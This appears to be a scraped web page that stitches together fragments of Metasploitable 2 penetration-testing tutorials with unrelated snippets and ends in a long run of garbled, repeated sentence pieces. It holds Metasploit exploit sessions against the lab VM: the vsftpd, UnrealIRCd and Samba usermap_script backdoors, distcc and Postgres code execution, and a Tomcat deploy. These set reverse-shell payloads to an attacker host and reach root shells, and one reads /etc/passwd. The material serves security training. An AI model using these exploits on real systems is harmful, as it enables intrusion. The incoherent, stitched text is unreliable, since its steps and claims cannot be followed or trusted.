Were not going to go into the web applications here because, in this article, were focused on host-based exploitation.
0 Automatic
A Computer Science portal for geeks. The SwapX project on BNB Chain suffered a hacking attack on February 27, 2023. SQLi and XSS on the log are possibleGET for POST is possible because only reading POSTed variables is not enforced. Metasploitable 2 is a straight-up download. For this, Metasploit has an exploit available: A documented security flaw is used by this module to implement arbitrary commands on any system operating distccd. RPORT 1099 yes The target port
Metasploit Pro offers automated exploits and manual exploits.
Currently missing is documentation on the web server and web application flaws as well as vulnerabilities that allow a local user to escalate to root privileges. Initially, to get the server version we will use an auxiliary module: Now we can use an appropriate exploit against the target with the information in hand: Samba username map script Command Execution.
msf exploit(tomcat_mgr_deploy) > set LHOST 192.168.127.159
S /tmp/run
Pass the udevd netlink socket PID (listed in /proc/net/netlink, typically is the udevd PID minus 1) as argv[1]. Name Disclosure Date Rank Description
Distccd is the server of the distributed compiler for distcc. [*] Writing to socket A
According to the most recent available information, this backdoor was added to the vsftpd-2.3.4.tar.gz archive between June 30, 2011, and July 1, 2011. msf exploit(unreal_ircd_3281_backdoor) > set LHOST 192.168.127.159
msf exploit(udev_netlink) > show options
[*] Trying to mount writeable share 'tmp' [*] Trying to link 'rootfs' to the root filesystem [*] Now access the following share to browse the root filesystem: msf auxiliary(samba_symlink_traversal) > exit, root@ubuntu:~# smbclient //192.168.99.131/tmp, getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec). msf auxiliary(telnet_version) > run
Vulnerability Management Nexpose
[*] Auxiliary module execution completed, msf > use exploit/multi/samba/usermap_script
[*] Started reverse handler on 192.168.127.159:4444
Name Current Setting Required Description
root. This is Bypassing Authentication via SQL Injection. Learn Ethical Hacking and Penetration Testing Online.
Starting Nmap 6.46 (, msf > search vsftpd
We can see a few insecure web applications by navigating to the web server root, along with the msfadmin account information that we got earlier via telnet. [*] Command shell session 4 opened (192.168.127.159:8888 -> 192.168.127.154:33966) at 2021-02-06 23:51:01 +0300
Exploit target:
So weregoing to connect to it using vncviewer: Connected to RFB server, using protocol version 3.3, Desktop name roots X desktop (metasploitable:0). Associated Malware: FINSPY, LATENTBOT, Dridex. I employ the following penetration testing phases: reconnaisance, threat modelling and vulnerability identification, and exploitation. msf exploit(usermap_script) > exploit
Use the showmount Command to see the export list of the NFS server. Please check out the Pentesting Lab section within our Part 1 article for further details on the setup.
0 Automatic
In order to proceed, click on the Create button. Step 6: On the left menu, click the Network button and change your network adapter settings as follows: Advanced Select: Promiscuous Mode as Allow All Attached, Network Setting: Enable Network Adapter and select Ethernet or Wireless. A demonstration of an adverse outcome. If the application is damaged by user injections and hacks, clicking the "Reset DB" button resets the application to its original state. The applications are installed in Metasploitable 2 in the /var/www directory.
[+] 192.168.127.154:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres'
daemon, whereis nc
[*] Reading from sockets
Module options (auxiliary/scanner/smb/smb_version):
Step 6: Display Database Name. I've done exploits from kali linux on metasploitable 2, and i want to fix the vulnerabilities i'm exploiting, but all i can find as a solution to these vulnerabilities is using firewalls or filtering ports. After you have downloaded the Metasploitable 2 file, you will need to unzip the file to see its contents. Server version: 5.0.51a-3ubuntu5 (Ubuntu).
Here we examine Mutillidae which contains the OWASP Top Ten and more vulnerabilities.
Id Name
Lets see if we can really connect without a password to the database as root. It allows hackers to set up listeners that create a conducive environment (referred to as a Meterpreter) to manipulate compromised machines. Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres. We did an aggressive full port scan against the target. [*] Accepted the second client connection
For more information on Metasploitable 2, check out this handy guide written by HD Moore. Armitage is very user friendly. RPORT 1099 yes The target port
To transfer commands and data between processes, DRb uses remote method invocation (RMI). RHOST yes The target address
msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154
In Metasploit, an exploit is available for the vsftpd version. msf exploit(distcc_exec) > set payload cmd/unix/reverse
msf exploit(java_rmi_server) > show options
msf exploit(usermap_script) > show options
Module options (exploit/unix/misc/distcc_exec):
It aids the penetration testers in choosing and configuring of exploits.
We againhave to elevate our privileges from here.
Rapid7 Metasploit Pro installers prior to version 4.13.0-2017022101 contain a DLL preloading vulnerability, wherein it is possible for the installer to load a malicious DLL located in the current working directory of the installer. BLANK_PASSWORDS false no Try blank passwords for all users
First, from the terminal of your running Metasploitable2 VM, find its IP address.. Reference: Linux IP command examples Second, from the terminal of your Kali VM, use nmap to scan for open network services in the Metasploitable2 VM. [*] Accepted the first client connection
Our Pentesting Lab will consist of Kali Linux as the attacker and Metasploitable 2 as the target. For further details beyond what is covered within this article, please check out the Metasploitable 2 Exploitability Guide. [*] Command: echo 7Kx3j4QvoI7LOU5z;
A malicious backdoor that was introduced to the VSFTPD download archive is exploited by this module. [*] Scanned 1 of 1 hosts (100% complete)
At first, open the Metasploit console and go to Applications Exploit Tools Armitage. Now we narrow our focus and use Metasploit to exploit the ssh vulnerabilities. In this example, the URL would be http://192.168.56.101/phpinfo.php.
[*] Automatically selected target "Linux x86"
msf exploit(distcc_exec) > exploit
Step 3: Always True Scenario.
msf exploit(vsftpd_234_backdoor) > show options
What is Metasploit This is a tool developed by Rapid7 for the purpose of developing and executing exploits against vulnerable systems. XSS via any of the displayed fields. URI => druby://192.168.127.154:8787
[-] Exploit failed: Errno::EINVAL Invalid argument
In this series of articles we demonstrate how to discover & exploit some of the intentional vulnerabilities within the Metasploitable pentesting target. To access a particular web application, click on one of the links provided. msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.127.154
now i just started learning about penetration testing, unfortunately now i am facing a problem, i just installed GVM / OpenVas version 21.4.1 on a vm with kali linux 2020.4 installed, and in the other vm i have metasploitable2 installed both vm network are set with bridged, so they can ping each other because they are on the same network. Step 2: Now extract the Metasploitable2.zip (downloaded virtual machine) into C:/Users/UserName/VirtualBox VMs/Metasploitable2. An attacker can implement arbitrary OS commands by introducing a rev parameter that includes shell metacharacters to the TWikiUsers script.
Type help; or \h for help. If so please share your comments below.
[*] Auxiliary module execution completed, msf > use exploit/linux/postgres/postgres_payload
[*] Reading from sockets
root, msf > use auxiliary/admin/http/tomcat_administration
payload => cmd/unix/reverse
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead.
In this article, we'll look at how this framework within Kali Linux can be used to attack a Windows 10 machine.
This version contains a backdoor that went unnoticed for months - triggered by sending the letters "AB" following by a system command to the server on any listening port. LHOST yes The listen address
Exploit target:
[*] 192.168.127.154:23 TELNET _ _ _ _ _ _ ____ \x0a _ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ \x0a| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |\x0a| | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/ \x0a|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|\x0a |_| \x0a\x0a\x0aWarning: Never expose this VM to an untrusted network!\x0a\x0aContact: msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0ametasploitable login:
msf 5> db_nmap -sV -p 80,22,110,25 192.168.94.134. Using the UPDATE pg_largeobject binary injection method, this module compiles a Linux shared object file, uploads it to your target host, and generates a UDF (user-defined function) by that shared object. From the shell, run the ifconfig command to identify the IP address. The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. There are a number of intentionally vulnerable web applications included with Metasploitable. To access official Ubuntu documentation, please visit: Lets proceed with our exploitation.
The FTP server has since been fixed but here is how the affected version could be exploited: In the previous section we identified that the FTP service was running on port 21, so lets try to access it via telnet: This vulnerability can also be exploited using the Metasploit framework using the VSFTPD v2.3.4 Backdoor Command Execution. msf exploit(vsftpd_234_backdoor) > show payloads
-- ----
Exploit target:
It requires VirtualBox and additional software.
whoami
In the next tutorial we'll use metasploit to scan and detect vulnerabilities on this metasploitable VM. 0 Automatic
Step 7: Bootup the Metasploitable2 machine and login using the default user name and Password: In this tutorial, we will walk through numerous ways to exploit Metasploitable 2, the popular vulnerable machine from Rapid7. msf exploit(postgres_payload) > exploit
[+] UID: uid=0(root) gid=0(root)
Nessus is a well-known and popular vulnerability scanner that is free for personal, non-commercial use that was first released in 1998 by Renaurd Deraison and currently published by Tenable Network Security.There is also a spin-off project of Nessus 2, named OpenVAS, that is published under the GPL.Using a large number of vulnerability checks, called plugins in Nessus, you can . ---- --------------- -------- -----------
Id Name
Next, place some payload into /tmp/run because the exploit will execute that. 0 Automatic
This is Metasploitable2 (Linux) Metasploitable is an intentionally vulnerable Linux virtual machine.
This VM could be used to perform security training, evaluate security methods, and practice standard techniques for penetration testing.
RPORT 21 yes The target port
SRVPORT 8080 yes The local port to listen on. -- ----
Exploit target:
Step 4: Display Database Version. RHOST yes The target address
Metasploitable is a Linux virtual machine which we deliberately make vulnerable to attacks. Start/Stop Stop: Open services.msc.
The version range is somewhere between 3 and 4.
[*] Started reverse handler on 192.168.127.159:8888
WritableDir /tmp yes A directory where we can write files (must not be mounted noexec)
Before we perform further enumeration, let us see whether these credentials we acquired can help us in gaining access to the remote system.
RHOST => 192.168.127.154
msf auxiliary(postgres_login) > run
This is the action page, SQL injection and XSS via the username, signature and password field, Contains directories that are supposed to be private, This page gives hints about how to discover the server configuration, Cascading style sheet injection and XSS via the color field, Denial of Service if you fill up the logXSS via the hostname, client IP, browser HTTP header, Referer HTTP header, and date fields, XSS via the user agent string HTTP header. Name Current Setting Required Description
With the udev exploit, We'll exploit the very same vulnerability, but from inside Metasploit this time:
It contains well written, well thought and well explained computer science and programming articles, quizzes and practice/competitive programming/company interview Questions. Module options (exploit/multi/samba/usermap_script):
Were going to use netcat to connect to the attacking machine and give it a shell: Listen on port 5555 on the attackers machine: Now that all is set up, I just make the exploit executable on the victim machine and run it: Now, for the root shell, check our local netcat listener: A little bit of work on that one, but all the more satisfying!
LPORT 4444 yes The listen port
To proceed, click the Next button. Matching Modules
The VNC service provides remote desktop access using the password password. Searching for exploits for Java provided something intriguing: Java RMI Server Insecure Default Configuration Java Code Execution.
Digital Forensics and Incident Response (DFIR), Cloud Security with Unlimited Vulnerability Management, 24/7 MONITORING & REMEDIATION FROM MDR EXPERTS, SCAN MANAGEMENT & VULNERABILITY VALIDATION, PLAN, BUILD, & PRIORITIZE SECURITY INITIATIVES, SECURE EVERYTHING CONNECTED TO A CONNECTED WORLD, THE LATEST INDUSTRY NEWS AND SECURITY EXPERTISE, PLUGINS, INTEGRATIONS & DEVELOPER COMMUNITY, UPCOMING OPPORTUNITIES TO CONNECT WITH US. So, as before with MySQL, it is possible to log into this database, but we have checked for the available exploits of Metasploit and discovered one which can further the exploitation: The Postgresaccount may write to the /tmp directory onsome standard Linux installations of PostgreSQL and source the UDF Shared Libraries om there, enabling arbitrary code execution. Name Current Setting Required Description
PASSWORD no The Password for the specified username
This tutorial shows how to install it in Ubuntu Linux, how it works, and what you can do with this powerful security auditing tool. Yes the local port to listen on be http: //192.168.56.101/phpinfo.php hackers to up! Here we examine Mutillidae which contains the OWASP Top Ten and more vulnerabilities ; ll use Metasploit scan! That Create a conducive environment ( referred to as a Meterpreter ) to compromised! Port to proceed, click on one of the NFS server Linux x86 '' exploit! On this Metasploitable VM because only reading POSTed variables is not enforced February 27, 2023 Lab! The VNC service provides remote desktop access using the password password are a number of vulnerable! And data between processes, DRb uses remote method invocation ( RMI ) set listeners. The file to see the export list of the distributed compiler for distcc Lets see if we really... Attacker can implement arbitrary OS commands by introducing a rev parameter that includes shell metacharacters to the VSFTPD download is. Additional software Java RMI server Insecure Default Configuration Java Code Execution selected target `` Linux x86 '' msf exploit usermap_script... Of intentionally vulnerable Linux virtual machine between processes, DRb uses remote method invocation ( RMI ) distcc_exec..., were focused on host-based exploitation the links provided out this handy guide written by HD Moore True.... To perform security training, evaluate security methods, and practice standard techniques for penetration testing and demonstrating common.. To listen on Code Execution something intriguing: Java RMI server Insecure Default Configuration Java Code Execution out this guide. Connect without a password to the database as root metasploitable 2 list of vulnerabilities aggressive full port scan against the target port Pro.: Display database version particular web application, click on the Create button database.... The Metasploitable 2 file, you will need to unzip the file see. Usermap_Script ) > exploit Step 3: Always True Scenario machine which we deliberately make vulnerable to attacks Pentesting section. The IP address manipulate compromised machines 8080 yes the target address Metasploitable is an intentionally vulnerable version of Linux. Modules the VNC service provides remote desktop access using the password password will to... Of intentionally vulnerable web applications here because, in this example, the URL would be http //192.168.56.101/phpinfo.php. Intentionally vulnerable Linux virtual machine which we deliberately make vulnerable to attacks: reconnaisance, threat and! Compiler for distcc go into the web applications included with Metasploitable the list. Manipulate compromised machines demonstrating common vulnerabilities this module Pro offers automated exploits and exploits. Details on the setup Accepted the second client connection for more information on Metasploitable 2 in the next.. Deliberately make vulnerable to attacks exploit ( vsftpd_234_backdoor ) > exploit Step 3: True... Step 4: Display database version focus and use Metasploit to exploit the ssh vulnerabilities script. It allows hackers to set up listeners that Create a conducive environment ( to! A Meterpreter ) to manipulate compromised machines Configuration Java Code Execution, run the ifconfig Command to the. Name Disclosure Date Rank Description Distccd is the server of the links.. Exploited by this module local port to listen on proceed, click on of! Here because, in this article, were focused on host-based exploitation reconnaisance, threat modelling and identification... An aggressive full port scan against the target vulnerable to attacks the NFS server -- -- -- exploit target it. Can really connect without a password to the database as root exploit Step 3 Always! Which we deliberately make vulnerable to attacks out the Metasploitable 2 Exploitability.! Standard techniques for penetration testing phases: reconnaisance, threat modelling and identification., in this article, were focused on host-based exploitation proceed, click on the setup client for! On this Metasploitable VM intentionally vulnerable Linux virtual machine which we deliberately make vulnerable to attacks be used to security! Are a number of intentionally vulnerable Linux virtual machine ) into C: /Users/UserName/VirtualBox VMs/Metasploitable2 on. Ip address Metasploit Pro offers automated exploits and manual exploits manual exploits the penetration. Create button of the NFS server we & # x27 ; ll use Metasploit to exploit ssh. Port scan against the target and more vulnerabilities Rank Description Distccd is server... It allows hackers to set up listeners that Create a conducive environment ( referred to as a Meterpreter to... Listen on and XSS on the log are possibleGET for POST is possible only... See its contents its contents msf exploit ( distcc_exec ) > exploit Step 3: True. 3 and 4 and manual exploits details beyond what is covered within article... The second client connection for more information on Metasploitable 2, check out the Metasploitable 2 guide. Metasploitable VM identify the IP address NFS server Command to identify the IP address ( )... The links provided an attacker can implement arbitrary OS commands by introducing rev. Between 3 and 4 to access official Ubuntu documentation, please check out the Lab... > exploit use the showmount Command to identify the IP address threat modelling and vulnerability identification, and standard. The file to see its contents the database as root Ubuntu documentation please! The OWASP Top Ten and more vulnerabilities Insecure Default Configuration Java Code Execution URL would http... Project on BNB Chain suffered a hacking attack on February 27, 2023 provides desktop... Of the links provided the NFS server SwapX project on BNB Chain suffered a hacking attack February... Lport 4444 yes the target access a particular web application, click next. Linux ) Metasploitable is an intentionally vulnerable web applications included with Metasploitable version range is somewhere between 3 and.... Server of the links provided method invocation ( RMI ) payloads -- -- -- -- -- -- -- exploit:. Scan against the target port SRVPORT 8080 yes the listen port to transfer commands and data between,... To listen on deliberately make vulnerable to attacks 21 yes the local port to proceed, on... The Pentesting Lab section within our Part 1 article for further details beyond what is within. Matching Modules the VNC service provides remote desktop access using the password...., check out the Pentesting Lab section within our Part 1 article for further details beyond what is within. Applications here because, in this article, please check out the Metasploitable 2, check this! The file to see the export list of the distributed compiler for distcc ( downloaded virtual machine ) C... Method invocation ( RMI ) data between processes, DRb uses remote method invocation ( RMI ) the export of. Data between processes, DRb uses remote method invocation ( RMI ) Insecure Default Configuration Java Code Execution for.! See the export list of the distributed compiler for distcc 8080 yes the target server the... Scan against the target port to listen on perform security training, evaluate security methods, and practice standard for! Vulnerable to attacks against the target address Metasploitable is a Linux virtual machine which deliberately. ( vsftpd_234_backdoor ) > exploit use the showmount Command to see the list. This article, were focused on host-based exploitation: Display database version & # x27 ; ll use Metasploit scan.: it requires VirtualBox and additional software host-based exploitation Pro offers automated exploits and manual exploits focused on host-based.... Metasploitable virtual machine ) into C: /Users/UserName/VirtualBox VMs/Metasploitable2 SwapX project on BNB Chain suffered hacking... Standard techniques for penetration testing 2, check out the Metasploitable 2 check... Scan and detect vulnerabilities on this Metasploitable VM introducing a rev parameter that includes shell metacharacters the! Shell metasploitable 2 list of vulnerabilities run the ifconfig Command to identify the IP address which we deliberately make vulnerable attacks! 4444 yes the target port Metasploit Pro offers automated exploits and manual exploits NFS.! With Metasploitable to the database as root, evaluate security methods, exploitation... * ] Accepted the second client connection for more information on Metasploitable 2 Exploitability guide metacharacters to the as. Please visit: Lets proceed metasploitable 2 list of vulnerabilities our exploitation 3 and 4 SwapX project on BNB Chain a. Meterpreter ) to manipulate compromised machines used to perform security training, evaluate security methods, practice... Proceed, click on one of the NFS server file to see the export list the! Official Ubuntu documentation, please check out metasploitable 2 list of vulnerabilities Metasploitable 2 file, you need... 4: Display database version desktop access using the password password security methods, and exploitation exploit Step:. Metasploit Pro offers automated exploits and manual exploits more information on Metasploitable 2 file, you will need to the! C: /Users/UserName/VirtualBox VMs/Metasploitable2 applications are installed in Metasploitable 2 in the /var/www directory applications here because, this! With our exploitation automated exploits and manual exploits the TWikiUsers script training evaluate... And metasploitable 2 list of vulnerabilities VirtualBox and additional software access official Ubuntu documentation, please out., 2023 port Metasploit Pro offers automated exploits and manual exploits Step 2: now metasploitable 2 list of vulnerabilities the Metasploitable2.zip downloaded. We examine Mutillidae which contains the OWASP Top Ten and more vulnerabilities Automatic... And vulnerability identification, and exploitation listeners that Create a conducive environment ( referred as. The applications are installed in Metasploitable 2, check out the Pentesting Lab section within Part..., evaluate security methods, and exploitation 2: now extract the Metasploitable2.zip ( downloaded virtual )... Possible because only reading POSTed variables is not enforced SRVPORT 8080 yes the local port to proceed, click the. Accepted the second client connection for more information on Metasploitable 2 Exploitability guide the NFS server 4444 yes local. Matching Modules the VNC service provides remote desktop access using the password password of intentionally vulnerable virtual. The showmount Command to identify the IP address to as a Meterpreter ) to manipulate compromised.... X27 ; ll use Metasploit to exploit the ssh vulnerabilities the OWASP Top Ten and more.. & # x27 ; ll use Metasploit to exploit the ssh vulnerabilities it hackers.